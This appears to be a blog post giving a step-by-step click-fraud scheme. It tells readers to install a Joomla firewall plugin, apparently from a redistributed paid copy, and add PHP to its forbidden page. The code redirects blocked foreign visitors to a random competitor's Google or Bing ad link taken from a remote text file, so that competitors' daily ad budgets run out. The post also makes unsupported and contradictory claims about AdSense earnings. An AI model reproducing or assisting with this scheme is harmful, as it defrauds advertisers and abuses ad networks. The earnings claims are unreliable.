Yes you can earn over $4,000 in a month with Google AdSense but Google will not paid you the earnings!

I earned over $4,000 from Google AdSense in July 2018 and Google did not paid me my earnings!

Google will make money from this so don't put any Ads on Google, Bing, or Yelp once this gets around the internet or you will be wasting a lot of Ad money.

Just this one site earned $1,233.39:

 

What you will need is a few websites but if you have one website, its okay. I have many websites and they have been on the web for over five years now. Hackers from ALL over the world try to get into my websites so I thought I would block ALL the counties outside the US with the Joomla plugin "RS Firewall" and using the script below would redirect them (outside the US) to a random link in this file "NameOfFile.txt". You can download my pro version of RS Firewall below and use it as you wish. I am using it to redirect Google and Bing Ad links when someone visits my websites that is outside the US.

Let's Get Started:

Download and install this plugin for Joomla 3.x: com_rsfirewall-v2-11-8

=================================================

Open this file "default.php" and add the code below to the top of the file.

File located at:

/components/com_rsfirewall/views/forbidden/tmpl/default.php

======= Add this Code Below =============================


<?php
$lines=array();
$fp=fopen('http://domain.com/NameOfFile.txt', 'r');
while (!feof($fp))
{
$line=fgets($fp);
//process line however you like
$line=trim($line);
//add to array
$lines[]=$line;
}
fclose($fp);
// Random shuffle
shuffle($lines);
// First element is random now
$randomValue = $lines[0];
header("Location: $randomValue");
exit;
?>


=====================================================

In the text file above "NameOfFile.txt" - Right Click on the Google or Bing Ad link and copy the link in this text file.

Now search Google or Bing for the business you want to remove. What I mean by "remove" is that each time someone clicks on a Google or Bing Ad it cost that business money. And when that business ad's money for the day is gone then your Ad will be above theirs, or if you don't run an ad, their ad will be removed for that day. 

If they have a Ad, just copy the link and paste it in your "NameOfFile.txt" file. One link per line.

Right Click and Select: Copy link address (Chrome, Google) or Copy link location (FireFox, Bing). If you don't see the Copy link address or Copy link location, just refresh the page.

=======================================================

Example below:

 

==============================================================

Right-Clicking on the image above your link should look something like this. Go ahead and click on it to see what it does.

https://www.google.com/aclk?sa=L&ai=DChcSEwjawbm8nMXfAhUX02QKHeyoAkAYABADGgJwag&sig=AOD64_3DjX2mcgrei7m8cD7yzZ1gAD8FZw&q=&ved=2ahUKEwjh8rS8nMXfAhVaHTQIHamwBogQ0Qx6BAgPEAE&adurl=

===================================================== 

 Yes its a very, very long link but this link will earn you money!

===================================================== 

Next goto: Components > RSFirewall! > Firewall Configuration
Download and update the files below (click here):
GeoIP Country Edition IPv4 (GeoIP.dat)
GeoIP Country Edition IPv6 (GeoIPv6.dat)

 

Hit "Save"

Now select ALL the counties you want to block!